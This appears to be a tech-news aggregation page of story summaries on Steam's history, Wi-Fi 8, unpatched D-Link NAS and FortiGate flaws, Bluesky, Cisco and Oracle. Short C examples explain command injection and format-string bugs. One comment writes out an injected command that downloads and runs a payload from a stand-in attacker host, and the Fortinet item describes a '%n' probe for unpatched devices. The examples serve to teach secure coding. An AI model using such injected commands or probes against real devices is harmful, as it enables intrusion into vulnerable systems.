First Person Shooters (Games)

Half-Life 2 Celebrates 20th Anniversary (arstechnica.com) 48

Each day leading up to the 16th (the day Half-Life 2 officially launched), Ars Technica will be publishing a new article looking back at the game and its impact. Here's an excerpt from an article published today by Ars Technica's Kyle Orland: When millions of eager gamers first installed Half-Life 2 20 years ago, many, if not most, of them found they needed to install another piece of software alongside it. Few at the time could imagine that piece of companion software -- with the pithy name Steam -- would eventually become the key distribution point and social networking center for the entire PC gaming ecosystem, making the idea of physical PC games an anachronism in the process.

While Half-Life 2 wasn't the first Valve game released on Steam, it was the first high-profile title to require the platform, even for players installing the game from physical retail discs. That requirement gave Valve access to millions of gamers with new Steam accounts and helped the company bypass traditional retail publishers of the day by directly marketing and selling its games (and, eventually, games from other developers). But 2004-era Steam also faced a vociferous backlash from players who saw the software as a piece of nuisance DRM (digital rights management) that did little to justify its existence at the time.
In honor of the anniversary, Orbifold Studios released a new Half-Life 2 RTX trailer. "[T]his is a remastering project that leverages the technologies of NVIDIA's RTX Remix and has the blessing of the original developer, Valve," reports Wccftech. "Orbifold Studios, a team of experienced modders, was founded specifically to bring this project to fruition." It's unclear when exactly this project will be finished.

Nvidia is also giving away a custom Half-Life 2-themed RTX 4080 Super Founders Edition.
Wireless Networking

Wi-Fi 8 Trades Speed For a More Reliable Experience (pcworld.com) 57

Wi-Fi 8 (also known as IEEE 802.11bn Ultra High Reliability) is expected to arrive around 2028, prioritizing an enhanced user experience over speed by optimizing interactions between devices and access points. While it retains bandwidth specifications similar to those of the previous standard, Wi-Fi 8 aims to improve network efficiency, reducing interference and congestion for a more reliable and adaptive connection. PCWorld's Mark Hachman reports: As of Nov. 2024, MediaTek believes that Wi-Fi 8 will look virtually identical to Wi-Fi 7 in several key areas: The maximum physical layer (PHY) rate will be the same at 2,880Mbps x 8, or 23Gbps. It will also use the same three frequency bands (2.4, 5, and 6GHz) and the same 4096 QAM modulation across a maximum channel bandwidth of 320MHz. (A Wi-Fi 8 router won't get 23Gbps of bandwidth, of course. According to MediaTek, the actual peak throughput in a "clean," or laboratory, environment is just 80 percent or so of the hypothetical peak throughput, and actual, real-world results can be far less.)
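Worked through, MediaTek's arithmetic looks like this; a minimal sketch in C, where the 80 percent efficiency factor is the article's clean-lab estimate rather than anything from the standard itself:

```c
#include <stdio.h>

int main(void) {
    /* MediaTek's Wi-Fi 8 figures, as quoted above */
    double phy_rate_mbps = 2880.0;  /* max PHY rate per stream, Mbps */
    int streams = 8;                /* 2,880Mbps x 8 */
    double lab_efficiency = 0.80;   /* ~80% of hypothetical peak in a "clean" environment */

    double peak_gbps = phy_rate_mbps * streams / 1000.0;
    printf("Hypothetical peak:    %.1f Gbps\n", peak_gbps);                  /* ~23.0 Gbps */
    printf("Lab-environment peak: %.1f Gbps\n", peak_gbps * lab_efficiency); /* ~18.4 Gbps */
    return 0;
}
```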

Still, put simply, Wi-Fi 8 should deliver the same wireless bandwidth as Wi-Fi 7, using the same channels and the same modulation. Every Wi-Fi standard has also been backwards-compatible with its predecessors. What Wi-Fi 8 will do, though, is change how your client device, such as a PC or a phone, interacts with multiple access points. Think of this as an evolution of how your laptop talks to your home's networking equipment. Over time, Wi-Fi has evolved from communications between one laptop and a router, across a single channel. Channel hopping routed different clients to different bands. When Wi-Fi 6E was developed, a dedicated 6GHz band was added, sometimes as a dedicated "backhaul" between your home's access points. Now, mesh networks are more common, giving your laptop a variety of access points, channels, and frequencies to select from.
For a detailed breakdown of the upcoming advancements coming to Wi-Fi 8, including Coordinated Spatial Reuse, Coordinated Beamforming, and Dynamic Sub-Channel Operation, read the full article.
Security

D-Link Won't Fix Critical Flaw Affecting 60,000 Older NAS Devices (bleepingcomputer.com) 87

D-Link confirmed no fix will be issued for the over 60,000 D-Link NAS devices that are vulnerable to a critical command injection flaw (CVE-2024-10914), allowing unauthenticated attackers to execute arbitrary commands through unsanitized HTTP requests. The networking company advises users to retire or isolate the affected devices from public internet access. BleepingComputer reports: The flaw impacts multiple models of D-Link network-attached storage (NAS) devices that are commonly used by small businesses: DNS-320 Version 1.00; DNS-320LW Version 1.01.0914.2012; DNS-325 Version 1.01, Version 1.02; and DNS-340L Version 1.08. [...] A search that security researcher Netsecfish conducted on the FOFA platform returned 61,147 results at 41,097 unique IP addresses for D-Link devices vulnerable to CVE-2024-10914.

In a security bulletin today, D-Link confirmed that a fix for CVE-2024-10914 is not coming and recommended that users retire vulnerable products. If that is not possible at the moment, users should at least isolate them from the public internet or place them under stricter access conditions. In April this year, the same researcher discovered an arbitrary command injection and hardcoded backdoor flaw, tracked as CVE-2024-3273, impacting mostly the same D-Link NAS models as the latest flaw.
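Command injection of this kind typically arises when a CGI handler splices an HTTP parameter into a shell command. Below is a generic sketch of the vulnerable pattern and a safer alternative; it illustrates the bug class only, not D-Link's actual code, and the useradd command and name parameter are hypothetical:

```c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* VULNERABLE: the request parameter is pasted into a shell command line.
 * A value like "; wget http://attacker/x -O /tmp/x; sh /tmp/x;" runs
 * attacker-chosen commands, because /bin/sh parses the metacharacters. */
void add_user_vulnerable(const char *name) {
    char cmd[256];
    snprintf(cmd, sizeof(cmd), "useradd %s", name);  /* unsanitized */
    system(cmd);
}

/* SAFER: no shell is involved; the parameter is a single argv entry,
 * so shell metacharacters are never interpreted. */
void add_user_safer(const char *name) {
    pid_t pid = fork();
    if (pid == 0) {
        execl("/usr/sbin/useradd", "useradd", name, (char *)NULL);
        _exit(127);            /* exec failed */
    } else if (pid > 0) {
        waitpid(pid, NULL, 0); /* reap the child */
    }
}
```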
Businesses

Ghost Jobs Are Wreaking Havoc On Tech Workers (sfgate.com) 90

An anonymous reader quotes a report from SFGATE: If you've recently been laid off and have started the arduous process of looking for a new job, you've probably seen them on networking platforms like LinkedIn: postings for roles that are 30 days old, maybe more, with suspiciously wide salary ranges. They usually have hundreds, or even thousands, of hopeful applicants vying for the same position, but if you do a quick cross-check and notice that the role isn't posted on the company's actual website -- or any of their social media pages -- you should probably stop drafting that cover letter, because it's possible they're not hiring at all. "Ghost jobs," or ads for positions that aren't actually open, are a common phenomenon in the tech industry, which has been plagued by layoffs and budget cuts over recent years. As unemployed workers struggle to regain their footing, recruiters and career coaches who spoke with SFGATE warned that these fake jobs posted by real companies serve multiple, sometimes insidious purposes.

According to a 2024 survey from MyPerfectResume, 81% of recruiters admitted to posting ads for positions that were fake or already filled. While some respondents said employers did it to maintain a presence on job boards and build a talent pool, it's also used to commit psychological warfare: 25% said ghost jobs helped companies gauge how replaceable their employees were, while 23% said it helped make the company appear more stable during a hiring freeze. Another damning 2024 report from Resume Builder said that 62% of companies posted them specifically to make their employees feel replaceable. They also made ads to "trick overworked employees" into believing that more people would be brought on to alleviate their overwhelming workload.

After interviewing 1,641 hiring managers, Resume Builder researchers found that 40% of employers posted fake job listings in 2024, and that three in 10 currently had ghost jobs listed. The idea to post them mostly trickled down from HR, followed by senior management and executives, their June 2024 article continued. Though the listings were posted on multiple hiring platforms, the majority of them appeared on LinkedIn and the companies' websites. Evidence suggests this trend is taking hold throughout the Bay Area, too. A collaborative document circulating online reveals a growing list of employers accused of posting ghost jobs. Many of them, it turns out, are tech companies with offices based in California.

Networking

BBC Interviews Charley Kline and Bill Duvall, Creators of Arpanet (bbc.com) 26

The BBC interviewed scientists Charley Kline and Bill Duvall 55 years after the first communications were made over a system called Arpanet, short for the Advanced Research Projects Agency Network. "Kline and Duvall were early inventors of networking, networks that would ultimately lead to what is today the Internet," writes longtime Slashdot reader dbialac. "Duvall had basic ideas of what might come of the networks, but they had no idea of how much of a phenomenon it would turn into." Here's an excerpt from the interview: BBC: What did you expect Arpanet to become?
Duvall: "I saw the work we were doing at SRI as a critical part of a larger vision, that of information workers connected to each other and sharing problems, observations, documents and solutions. What we did not see was the commercial adoption nor did we anticipate the phenomenon of social media and the associated disinformation plague. Although, it should be noted, that in [SRI computer scientist] Douglas Engelbart's 1962 treatise describing the overall vision, he notes that the capabilities we were creating would trigger profound change in our society, and it would be necessary to simultaneously use and adapt the tools we were creating to address the problems which would arise from their use in society."

What aspects of the internet today remind you of Arpanet?
Duvall: Referring to the larger vision which was being created in Engelbart's group (the mouse, full screen editing, links, etc.), the internet today is a logical evolution of those ideas enhanced, of course, by the contributions of many bright and innovative people and organisations.

Kline: The ability to use resources from others. That's what we do when we use a website. We are using the facilities of the website and its programs, features, etc. And, of course, email. The Arpanet pretty much created the concept of routing and multiple paths from one site to another. That got reliability in case a communication line failed. It also allowed increases in communication speeds by using multiple paths simultaneously. Those concepts have carried over to the internet. As we developed the communications protocols for the Arpanet, we discovered problems, redesigned and improved the protocols and learned many lessons that carried over to the Internet. TCP/IP [the basic standard for internet connection] was developed both to interconnect networks, in particular the Arpanet with other networks, and also to improve performance, reliability and more.

How do you feel about this anniversary?
Kline: That's a mix. Personally, I feel it is important, but a little overblown. The Arpanet and what sprang from it are very important. This particular anniversary to me is just one of many events. I find the decisions by Arpa to build the network and to continue supporting its development somewhat more important than this particular anniversary.

Duvall: It's nice to remember the origin of something like the internet, but the most important thing is the enormous amount of work that has been done since that time to turn it into what is a major part of societies worldwide.

Network

IPv6 May Already Be Irrelevant - But So Is Moving Off IPv4, Argues APNIC's Chief Scientist (theregister.com) 213

The chief scientist of the Asia Pacific Network Information Center has a theory about why the world hasn't moved to IPv6. From a report: In a lengthy post to the center's blog, Geoff Huston recounts that the main reason for the development of IPv6 was a fear the world would run out of IP addresses, hampering the growth of the internet. But IPv6 represented evolution -- not revolution. "The bottom line was that IPv6 did not offer any new functionality that was not already present in IPv4. It did not introduce any significant changes to the operation of IP. It was just IP, with larger addresses," Huston wrote.

IPv6's designers assumed that the protocol would take off because demand for IPv4 was soaring. But in the years after IPv6 debuted, Huston observes, "There was no need to give the transition much thought." Internetworking wonks assumed applications, hosts, and networks would become dual stack and support IPv6 alongside IPv4, before phasing out the latter. But then mobile internet usage exploded, and network operators had to scale to meet unprecedented demand created by devices like the iPhone. "We could either concentrate our resources on meeting the incessant demands of scaling, or we could work on IPv6 deployment," Huston wrote.

Security

How WatchTowr Explored the Complexity of a Vulnerability in a Secure Firewall Appliance (watchtowr.com) 9

Cybersecurity startup watchTowr "was founded by hacker-turned-entrepreneur Benjamin Harris," according to a recent press release touting their Fortune 500 customers and $29 million in investments from venture capital firms. ("If there's a way to compromise your organization, watchTowr will find it," Harris says in the announcement.)

This week they shared their own research on a Fortinet FortiGate SSLVPN appliance vulnerability (discovered in February by Gwendal Guégniaud of the Fortinet Product Security team — presumably in a static analysis for format string vulnerabilities). "It affected (before patching) all currently-maintained branches, and recently was highlighted by CISA as being exploited-in-the-wild... It's a Format String vulnerability [that] quickly leads to Remote Code Execution via one of many well-studied mechanisms, which we won't reproduce here..."

"Tl;dr SSLVPN appliances are still sUpEr sEcurE," their post begains — but the details are interesting. When trying to test an exploit, Watchtowr discovered instead that FortiGate always closed the connection early, thanks to an exploit mitigation in glibc "intended to hinder clean exploitation of exactly this vulnerability class." Watchtowr hoped to "use this to very easily check if a device is patched — we can simply send a %n, and if the connection aborts, the device is vulnerable. If the connection does not abort, then we know the device has been patched... " But then they discovered "Fortinet added some kind of certificate validation logic in the 7.4 series, meaning that we can't even connect to it (let alone send our payload) without being explicitly permitted by a device administrator." We also checked the 7.0 branch, and here we found things even more interesting, as an unpatched instance would allow us to connect with a self-signed certificate, while a patched machine requires a certificate signed by a configured CA. We did some reversing and determined that the certificate must be explicitly configured by the administrator of the device, which limits exploitation of these machines to the managing FortiManager instance (which already has superuser permissions on the device) or the other component of a high-availability pair. It is not sufficient to present a certificate signed by a public CA, for example...

Fortinet's advice here is simply to update, which is always sound advice, but doesn't really communicate the nuance of this vulnerability... Assuming an organisation is unable to apply the supplied workaround, the urgency of upgrade is largely dictated by the willingness of the target to accept a self-signed certificate. Targets that will do so are open to attack by any host that can access them, while those devices that require a certificate signed by a trusted root are rendered unexploitable in all but the narrowest of cases (because the TLS/SSL ecosystem is just so solid, as we recently demonstrated)...

While it's always a good idea to update to the latest version, the life of a sysadmin is filled with cost-to-benefit analysis, juggling the needs of users with their best interests.... [I]t is somewhat troubling when third parties need to reverse patches to uncover such details.
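For context on the bug class watchTowr describes: a format-string vulnerability occurs when attacker-controlled data is used as the format argument itself. A minimal sketch follows (generic C, not Fortinet's code); the glibc mitigation mentioned above behaves like the _FORTIFY_SOURCE check, which aborts the process when %n appears in a writable format string, consistent with the dropped connections watchTowr saw:

```c
#include <stdio.h>

/* BUG: user input is the format string. "%x %x %x" leaks stack contents,
 * and "%n" writes an attacker-influenced value to memory, the classic
 * stepping stone to remote code execution. Built against glibc with
 * -D_FORTIFY_SOURCE=2, a %n in a writable format string aborts instead. */
void log_message_vulnerable(const char *user_input) {
    printf(user_input);
}

/* FIX: the input is passed strictly as data, never as a format string. */
void log_message_fixed(const char *user_input) {
    printf("%s", user_input);
}
```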

Thanks to Slashdot reader Mirnotoriety for sharing the article.
United States

The Pentagon Wants To Use AI To Create Deepfake Internet Users (theintercept.com) 83

schwit1 writes: The Department of Defense wants technology so it can fabricate online personas that are indistinguishable from real people.

The United States' secretive Special Operations Command is looking for companies to help create deepfake internet users so convincing that neither humans nor computers will be able to detect they are fake, according to a procurement document reviewed by The Intercept.

The plan, mentioned in a new 76-page wish list by the Department of Defense's Joint Special Operations Command, or JSOC, outlines advanced technologies desired for the country's most elite, clandestine military efforts. "Special Operations Forces (SOF) are interested in technologies that can generate convincing online personas for use on social media platforms, social networking sites, and other online content," the entry reads.

Network

Cisco Is Abandoning the LoRaWAN Space With No Lifeboat For IoT Customers (theregister.com) 37

Cisco is exiting the LoRaWAN market for IoT device connectivity, with no migration plans for customers. "LoRaWAN is a low power, wide area network specification, specifically designed to connect devices such as sensors over relatively long distances," notes The Register. "It is built on LoRa, a form of wireless communication that uses spread spectrum modulation, and makes use of license-free sub-gigahertz industrial, scientific, and medical (ISM) radio bands. The tech is overseen by the LoRa Alliance." From the report: Switchzilla made this information public in a notice on its website announcing the end-of-sale and end-of-life dates for Cisco LoRaWAN. The last day customers will be able to order any affected products will be January 1, 2025, with all support ceasing by the end of the decade. The list includes Cisco's 800 MHz and 900 MHz LoRaWAN Gateways, plus associated products such as omni-directional antennas and software for the Gateways and Interface Modules. If anyone was in any doubt, the notification spells it out: "Cisco will be exiting the LoRaWAN space. There is no planned migration for Cisco LoRaWAN gateways."
Programming

'Compile and Run C in JavaScript', Promises Bun (thenewstack.io) 54

The JavaScript runtime Bun is a Node.js/Deno alternative (that's also a bundler/test runner/package manager).

And Bun 1.1.28 now includes experimental support for compiling and running native C from JavaScript, according to this report from The New Stack: "From compression to cryptography to networking to the web browser you're reading this on, the world runs on C," wrote Jarred Sumner, creator of Bun. "If it's not written in C, it speaks the C ABI (C++, Rust, Zig, etc.) and is available as a C library. C and the C ABI are the past, present, and future of systems programming." This is a low-boilerplate way to use C libraries and system libraries from JavaScript, he said, adding that this feature allows the same project that runs JavaScript to also run C without a separate build step... "It's good for glue code that binds C or C-like libraries to JavaScript. Sometimes, you want to use a C library or system API from JavaScript, and that library was never meant to be used from JavaScript," Sumner added.

It's currently possible to achieve this by compiling to WebAssembly or writing an N-API (napi) addon or V8 C++ API library addon, the team explained. But both are suboptimal... WebAssembly can do this but its isolated memory model comes with serious tradeoffs, the team wrote, including an inability to make system calls and a requirement to clone everything. "Modern processors support about 280 TB of addressable memory (48 bits). WebAssembly is 32-bit and can only access its own memory," Sumner wrote. "That means by default, passing strings and binary data JavaScript ↔ WebAssembly must clone every time. For many projects, this negates any performance gain from leveraging WebAssembly."

The latest version of Bun, released Friday, builds on this by adding N-API (napi) support to cc [Bun's C compiler, which uses TinyCC to compile the C code]. "This makes it easier to return JavaScript strings, objects, arrays and other non-primitive values from C code," wrote Sumner. "You can continue to use types like int, float, double to send & receive primitive values from C code, but now you can also use N-API types! Also, this works when using dlopen to load shared libraries with bun:ffi (such as Rust or C++ libraries with C ABI exports)....

"TinyCC compiles to decently performant C, but it won't do advanced optimizations that Clang or GCC does like autovectorization or very specialized CPU instructions," Sumner wrote. "You probably won't get much of a performance gain from micro-optimizing small parts of your codebase through C, but happy to be proven wrong!"

Businesses

Cisco's Second Layoff of 2024 Affects Thousands of Employees (techcrunch.com) 25

U.S. tech giant Cisco has let go of thousands of employees following its second layoff of 2024. From a report: The technology and networking company announced in August that it would reduce its headcount by 7%, or around 5,600 employees, following an earlier layoff in February, in which the company let go of about 4,000 employees. As TechCrunch previously reported, Cisco employees said that the company refused to say who was affected by the layoffs until September 16. Cisco did not give a reason for the month-long delay in notifying affected staff. One employee told TechCrunch at the time that Cisco's workplace had become the "most toxic environment" they had worked in. TechCrunch has learned that the layoffs also affect Talos Security, the company's threat intelligence and security research unit.
AI

Ellison Declares Oracle 'All In' On AI Mass Surveillance (theregister.com) 114

Oracle cofounder Larry Ellison envisions AI as the backbone of a new era of mass surveillance, positioning Oracle as a key player in AI infrastructure through its unique networking architecture and partnerships with AWS and Microsoft. The Register reports: Ellison made the comments near the end of an hour-long chat at the Oracle financial analyst meeting last week during a question and answer session in which he painted Oracle as the AI infrastructure player to beat in light of its recent deals with AWS and Microsoft. Many companies, Ellison touted, build AI models at Oracle because of its "unique networking architecture," which dates back to the database era.

"AI is hot, and databases are not," he said, making Oracle's part of the puzzle less sexy, but no less important, at least according to the man himself - AI systems have to have well-organized data, or else they won't be that valuable. The fact that some of the biggest names in cloud computing (and Elon Musk's Grok) have turned to Oracle to run their AI infrastructure means it's clear that Oracle is doing something right, claimed now-CTO Ellison. "If Elon and Satya [Nadella] want to pick us, that's a good sign - we have tech that's valuable and differentiated," Ellison said, adding: One of the ideal uses of that differentiated offering? Maximizing AI's pubic security capabilities.

"The police will be on their best behavior because we're constantly watching and recording everything that's going on," Ellison told analysts. He described police body cameras that were constantly on, with no ability for officers to disable the feed to Oracle. Even requesting privacy for a bathroom break or a meal only meant sections of recording would require a subpoena to view - not that the video feed was ever stopped. AI would be trained to monitor officer feeds for anything untoward, which Ellison said could prevent abuse of police power and save lives. [...] "Citizens will be on their best behavior because we're constantly recording and reporting," Ellison added, though it's not clear what he sees as the source of those recordings - police body cams or publicly placed security cameras. "There are so many opportunities to exploit AI," he said.
Electronic Frontier Foundation

EFF Decries 'Brazen Land-Grab' Attempt on 900 MHz 'Commons' Frequency Used By Amateur Radio (eff.org) 145

An EFF article calls out a "brazen attempt to privatize" a wireless frequency band (900 MHz) which America's FCC left "as a commons for all... for use by amateur radio operators, unlicensed consumer devices, and industrial, scientific, and medical equipment." The spectrum has also become "a hotbed for new technologies and community-driven projects. Millions of consumer devices also rely on the range, including baby monitors, cordless phones, IoT devices, and garage door openers." But NextNav would rather claim these frequencies, fence them off, and lease them out to mobile service providers. This is just another land-grab by a corporate rent-seeker dressed up as innovation. EFF and hundreds of others have called on the FCC to decisively reject this proposal and protect the open spectrum as a commons that serves all.

NextNav [which sells a geolocation service] wants the FCC to reconfigure the 902-928 MHz band to grant them exclusive rights to the majority of the spectrum... This proposal would not only give NextNav their own lane, but also an expanded operating region, increased broadcasting power, and more leeway for radio interference emanating from their portions of the band. All of this points to more power for NextNav at everyone else's expense.

This land-grab is purportedly to implement a Positioning, Navigation and Timing (PNT) network to serve as a US-specific backup of the Global Positioning System (GPS). This plan raises red flags right off the bat. Dropping the "global" from GPS makes it far less useful for any alleged national security purposes, especially as it is likely susceptible to the same jamming and spoofing attacks as GPS. NextNav itself admits there is also little commercial demand for PNT. GPS works, is free, and is widely supported by manufacturers. If NextNav has a grand plan to implement a new and improved standard, it was left out of their FCC proposal. What NextNav did include, however, is its intent to resell their exclusive bandwidth access to mobile 5G networks. This isn't about national security or innovation; it's about a rent-seeker monopolizing access to a public resource. If NextNav truly believes in their GPS backup vision, they should look to parts of the spectrum already allocated for 5G.

The open sections of the 900 MHz spectrum are vital for technologies that foster experimentation and grassroots innovation. Amateur radio operators, developers of new IoT devices, and small-scale operators rely on this band. One such project is Meshtastic, a decentralized communication tool that allows users to send messages across a network without a central server. This new approach to networking offers resilient communication that can endure emergencies where current networks fail. This is the type of innovation that actually addresses crises raised by NextNav, and it's happening in the part of the spectrum allocated for unlicensed devices while empowering communities instead of a powerful intermediary. Yet, this proposal threatens to crush such grassroots projects, leaving them without a commons in which they can grow and improve.

This isn't just about a set of frequencies. We need an ecosystem which fosters grassroots collaboration, experimentation, and knowledge building. Not only do these commons empower communities, they avoid a technology monoculture unable to adapt to new threats and changing needs as technology progresses. Invention belongs to the public, not just to those with the deepest pockets. The FCC should ensure it remains that way.

NextNav's proposal is a direct threat to innovation, public safety, and community empowerment. While FCC comments on the proposal have closed, replies remain open to the public until September 20th. The FCC must reject this corporate land-grab and uphold the integrity of the 900 MHz band as a commons.

Networking

'Samba' Networking Protocol Project Gets Big Funding from the German Sovereign Tech Fund (samba.plus) 33

Samba is "a free software re-implementation of the SMB networking protocol," according to Wikipedia. And now the Samba project "has secured significant funding (€688,800.00) from the German Sovereign Tech Fund to advance the project," writes Jeremy Allison — Sam (who is Slashdot reader #8,157 — and also a long standing member of Samba's core team): The investment was successfully applied for by [information security service provider] SerNet. Over the next 18 months, Samba developers from SerNet will tackle 17 key development subprojects aimed at enhancing Samba's security, scalability, and functionality.

The Sovereign Tech Fund is a German federal government funding program that supports the development, improvement, and maintenance of open digital infrastructure. Their goal is to sustainably strengthen the open source ecosystem.

The project's focus is on areas like SMB3 Transparent Failover, SMB3 UNIX extensions, SMB-Direct, performance, and modern security protocols such as SMB over QUIC. These improvements are designed to ensure that Samba remains a robust and secure solution for organizations that rely on a sovereign IT infrastructure. Development work began as early as September 1st and is expected to be completed by the end of February 2026 for all sub-projects.

All development will be done in the open following the existing Samba development process. The first GitLab CI pipelines have already been running and GitLab MRs will appear soon!

Back in 2000, Jeremy Allison answered questions from Slashdot readers about Samba.

Allison is now a board member at both the GNOME Foundation and the Software Freedom Conservancy, a distinguished engineer at Rocky Linux creator CIQ, and a long-time free software advocate.
Security

Fortinet Confirms Data Breach After Hacker Claims To Steal 440GB of Files (bleepingcomputer.com) 25

Cybersecurity giant Fortinet has confirmed it suffered a data breach after a threat actor claimed to steal 440GB of files from the company's Microsoft Sharepoint server. From a report: Fortinet is one of the largest cybersecurity companies in the world, selling secure networking products like firewalls, routers, and VPN devices. The company also offers SIEM, network management, and EDR/XDR solutions, as well as consulting services.

Early this morning, a threat actor posted to a hacking forum that they had stolen 440GB of data from Fortinet's Azure Sharepoint instance. The threat actor then shared credentials to an alleged S3 bucket where the stolen data is stored for other threat actors to download. The threat actor, known as "Fortibitch," claims to have tried to extort Fortinet into paying a ransom, likely to prevent the publishing of data, but the company refused to pay. In response to our questions about the incident, Fortinet confirmed that customer data was stolen from a "third-party cloud-based shared file drive."

Media

Bluesky Lets You Post Videos Now (theverge.com) 5

Bluesky, the decentralized social networking startup, has introduced support for videos up to 60 seconds long in its latest update, version 1.91. The Verge reports: The videos will autoplay by default, but Bluesky says you can turn this feature off in the settings menu. You can also add subtitles to your videos, as well as apply labels for things like adult content. There are some limitations to Bluesky's video feature, as the platform will only allow up to 25 video uploads (or 10GB of video) per day.

To protect Bluesky from harmful content or spam, it will require users to verify their email addresses before posting a video. Bluesky may also take away someone's ability to post videos if they repeatedly violate its community guidelines. The platform will also run videos through Hive, an AI moderation solution, and Thorn, a nonprofit that fights child sexual abuse, to check for illegal content or media that needs a warning.

Social Networks

Bluesky Adds 2 Million New Users After Brazil's X Ban (techcrunch.com) 94

In the days following Brazil's shutdown of X, the decentralized social networking startup Bluesky added over 2 million new users, up from just half a million as of Friday. "This rapid growth led some users to encounter the occasional error that would state there were 'Not Enough Resources' to handle requests, as Bluesky engineers scrambled to keep the servers stable under the influx of new sign-ups," reports TechCrunch's Sarah Perez. From the report: As new users downloaded the app, Bluesky jumped to No. 1 in Brazil over the weekend, ahead of Meta's X competitor, Instagram Threads. According to app intelligence firm Appfigures, Bluesky's total downloads soared by 10,584% this weekend compared to last, and its downloads in Brazil were up by a whopping 1,018,952%. The growth seems to be having a halo effect, as downloads outside Brazil also rose by 584%, the firm noted. In part, this is due to Bluesky receiving downloads in 22 countries where it had barely seen any traction before.

In terms of absolute downloads, countries that saw the most installs outside Brazil included the U.S., Portugal, the U.K., Canada and Spain. Those with the most download growth, however, were Portugal, Chile, Argentina, Colombia and Romania. Most of the latter group jumped from single-digit growth to growth in the thousands. Bluesky's newcomers have actively engaged on the platform, too, driving up other key metrics.

As one Bluesky engineer remarked, the number of likes on the social network grew to 104.6 million over the past four-day period, up from just 13 million when compared with a similar period just a week ago. Follows also grew from 1.4 million to 100.8 million while reposts grew from 1.3 million to 11 million. As of Monday, Bluesky said it had added 2.11 million users during the past four days, up from 26,000 users it had added in the week-ago period. In addition, the company noted it had seen "significantly more than a 100% [daily active users] increase." On Tuesday, Bluesky told TechCrunch the number is now 2.4 million and continues to grow "by the minute."

Technology

Nvidia Takes an Added Role Amid AI Craze: Data-Center Designer (msn.com) 24

Nvidia dominates the chips at the center of the AI boom. It wants to conquer almost everything else that makes those chips tick, too. From a report: Chief Executive Jensen Huang is increasingly broadening his company's focus -- and seeking to widen its advantage over competitors -- by offering software, data-center design services and networking technology in addition to its powerful silicon brains. More than a supplier of a valuable hardware component, he is trying to build Nvidia into a one-stop shop for all the key elements in the data centers where tools like OpenAI's ChatGPT are created and deployed -- or what he calls "AI factories."

Huang emphasized Nvidia's growing prowess at data-center design following an earnings report Wednesday that exceeded Wall Street forecasts. The report came days after rival AMD agreed to pay nearly $5 billion to buy data-center design and manufacturing company ZT Systems to try to gain ground on Nvidia. "We have the ability fairly uniquely to integrate to design an AI factory because we have all the parts," Huang said in a call with analysts. "It's not possible to come up with a new AI factory every year unless you have all the parts." It is a strategy designed to extend the business success that has made Nvidia one of the world's most valuable companies -- and to insulate it from rivals eager to eat into its AI-chip market share, estimated at more than 80%. Gobbling up more of the value in AI data centers both adds revenue and makes its offerings stickier for customers.

[...] Nvidia is building on the effectiveness of its 17-year-old proprietary software, called CUDA, which enables programmers to use its chips. More recently, Huang has been pushing resources into a superfast networking protocol called InfiniBand, after acquiring the technology's main equipment maker, Mellanox Technologies, five years ago for nearly $7 billion. Analysts estimate that InfiniBand is used in most AI-training deployments. Nvidia is also building a business that supplies AI-optimized Ethernet, a form of networking widely used in traditional data centers. The Ethernet business is expected to generate billions of dollars in revenue within a year, Chief Financial Officer Colette Kress said Wednesday. More broadly, Nvidia sells products including central processors and networking chips for a range of other data-center equipment that is fine-tuned to work seamlessly together.

Social Networks

'Uncertainty' Drives LinkedIn To Migrate From CentOS To Azure Linux (theregister.com) 79

The Register's Liam Proven reports: Microsoft's in-house professional networking site is moving to Microsoft's in-house Linux. This could mean that big changes are coming for the former CBL-Mariner distro. Ievgen Priadka's post on the LinkedIn Engineering blog, titled Navigating the transition: adopting Azure Linux as LinkedIn's operating system, is the visible sign of what we suspect has been a massive internal engineering effort. It describes some of the changes needed to migrate what the post calls "most of our fleet" from the end-of-life CentOS 7 to Microsoft Azure Linux -- the distro that grew out of and replaced its previous internal distro, CBL-Mariner.

This is an important stage in a long process. Microsoft acquired LinkedIn way back in 2016. Even so, as recently as the end of last year, we reported that a move to Azure had been abandoned, which came a few months after it laid off almost 700 LinkedIn staff -- the majority in R&D. The blog post is over 3,500 words long, so there's quite a lot to chew on -- and we're certain that this has been passed through and approved by numerous marketing and management people and scoured of any potentially embarrassing admissions. Some interesting nuggets remain, though. We enjoyed the modest comment that: "However, with the shift to CentOS Stream, users felt uncertain about the project's direction and the timeline for updates. This uncertainty created some concerns about the reliability and support of CentOS as an operating system." [...]

There are some interesting technical details in the post too. It seems LinkedIn is running on XFS -- also the RHEL default file system, of course -- with the notable exception of Hadoop, and so the Azure Linux team had to add XFS support. Some CentOS and actual RHEL is still used in there somewhere. That fits perfectly with using any of the RHELatives. However, the post also mentions that the team developed a tool to aid with deploying via MaaS, which it explicitly defines as Metal as a Service. MaaS is a Canonical service, although it does support other distros -- so alongside CentOS, there may have been some Ubuntu in the LinkedIn stack as well. Some details hint at what we suspect were probably major deployment headaches. [...] Some of the other information covers things the teams did not do, which is equally informative. [...]

The Internet

Quantum Internet Prototype Runs For 15 Days Under New York City (phys.org) 27

Under the streets of New York City, they're testing a "quantum network," reports Phys.org — where engineers from a Brooklyn company named Qunnect Inc are taking steps to "overcome the fragility of entangled states in a fiber cable and ensure the efficiency of signal delivery." For their prototype network, the Qunnect researchers used a leased 34-kilometer-long fiber circuit they called the GothamQ loop. Using polarization-entangled photons, they operated the loop for 15 continuous days, achieving an uptime of 99.84% and a compensation fidelity of 99% for entangled photon pairs transmitted at a rate of about 20,000 per second. At a half-million entangled photon pairs per second, the fidelity was still nearly 90%...

They sent 1,324 nm polarization-entangled photon pairs in quantum superpositions through the fiber, one state with both polarizations horizontal and the other with both vertical — a two-qubit configuration more generally known as a Bell state. In such a superposition, the quantum mechanical photon pairs are in both states at the same time.
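In standard notation, the state described, an equal superposition of both photons horizontally polarized and both vertically polarized, is the Bell state (up to a relative phase the article doesn't specify):

$$ |\Phi^{+}\rangle = \frac{1}{\sqrt{2}}\left( |HH\rangle + |VV\rangle \right) $$

Measuring either photon's polarization then immediately determines the other's; the fidelity figures above quantify how well this state survives transmission through the fiber loop.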

